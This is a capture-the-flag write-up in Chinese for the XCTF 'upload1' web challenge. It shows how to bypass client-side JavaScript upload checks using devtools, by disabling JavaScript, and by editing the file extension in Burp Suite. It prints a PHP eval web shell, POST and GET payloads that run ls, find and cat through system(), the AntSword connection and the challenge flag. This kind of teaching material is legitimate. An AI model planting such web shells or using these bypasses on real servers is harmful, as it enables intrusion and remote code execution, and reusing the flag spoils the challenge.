XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)

目录标题

  • (1)把οnchange="check();去掉
  • (2)禁用浏览器的JS脚本运行
  • (3)Burp Suite抓包修改文件后缀名
  • POST方法一句话木马
  • GET方法一句话木马
  • 蚁剑连接

打开题目地址:
在这里插入图片描述

是一个文件上传的题目
选择一个一句话脚本上传:
XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)_第1张图片

前端存在JS代码校验文件类型,如果上传的文件后缀不是jpg和png,就会让上传按钮变得不使能:
XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)_第2张图片

要绕过前端的JS代码校验,常见的方法有:

(1)把οnchange="check();去掉

可以直接把οnchange="check();去掉,这样提交文件的时候就不会校验文件类型了。
F12查看页面代码:
XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)_第3张图片

删除οnchange="check();
XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)_第4张图片

结果发现选择了1.php文件之后,依然校验了文件后缀,让上传按钮变得不使能了:
XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)_第5张图片
但是在火狐浏览器删除οnchange="check();之后,却已经可以上传1.php文件了:
XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)_第6张图片

点击上传:
XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)_第7张图片

上传成功!

所以谷歌浏览器可能需要把整段JS代码都删掉,那我们干脆直接选择了1.php文件之后:
XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)_第8张图片

把上传按钮的disable属性去掉:
XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)_第9张图片

之后上传按钮就变得使能了,上传1.php:
XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)_第10张图片

上传成功!

(2)禁用浏览器的JS脚本运行

禁用浏览器的JS脚本运行,这样提交文件的时候就也不会校验文件类型了。
例如谷歌浏览器,在高级设置->隐私设置和安全性->JavaScript中,或者直接输入网址:

chrome://settings/content/javascript

XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)_第11张图片

不允许网站使用 JavaScript,可以暂时设置所有网站或者指定目标网址不能执行JavaScript脚本。
再选择1.php:
XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)_第12张图片

没有触发js脚本,上传按钮依旧使能,可以直接上传:
XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)_第13张图片

上传成功!

(3)Burp Suite抓包修改文件后缀名

先将,从浏览器选择11.jpg上传,然后Burp Suite抓包:
XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)_第14张图片

之后发送到重发器,将11.jpg改回11.php然后再发送:
XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)_第15张图片

也能成功上传。

POST方法一句话木马

 @eval($_POST['attack']); ?>

一句话木马的原理,通过php的eval函数执行由POST方式提交的attack变量的值,就是把attack=xxx 字符串当成php语句执行。这里的attack只是变量名,也可以改成其他的。
这个一句话木马需要用POST方式提交attack变量的值:

attack=phpinfo();

XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)_第16张图片

phpinfo()输出PHP当前状态的大量信息,包含了 PHP 编译选项、启用的扩展、PHP 版本、服务器信息和环境变量(如果编译为一个模块的话)、PHP环境变量、操作系统版本信息、path 变量、配置选项的本地值和主值、HTTP 头和PHP授权信息(License)。
之后我们可以执行查看当前目录下文件的命令:

attack=system('ls');

XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)_第17张图片

之后搜索flag文件:

attack=system('find / -name "flag*" ');

XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)_第18张图片

发现在/var/www/html/flag.php路径下有flag:
查看flag文件:

attack=system('cat /var/www/html/flag.php');

XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)_第19张图片

返回的flag.php文件内容在注释中,得到flag:cyberpeace{96e8b99eee701e52288e986eb8ea3f2c}

GET方法一句话木马

一句话木马也可以通过GET方式提交attack变量的值。
上传一个2.php
XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)_第20张图片

之后连接:

http://111.200.241.244:54118/upload/1637599461.2.php?attack=system('cat /var/www/html/flag.php');

XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)_第21张图片

得到flag:cyberpeace{96e8b99eee701e52288e986eb8ea3f2c}

蚁剑连接

此外也可以用蚁剑连接:

 @eval($_POST['attack']); ?>

连接第一个POST方式的一句话木马:
XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)_第22张图片

之后就可以使用虚拟终端、查看文件管理、进行数据库操作等:
XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)_第23张图片

找到flag.php:
XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)_第24张图片

得到flag:cyberpeace{96e8b99eee701e52288e986eb8ea3f2c}

你可能感兴趣的:(#,Bugku,XCTF-WEB类写题过程,前端,web安全,安全,javascript,php)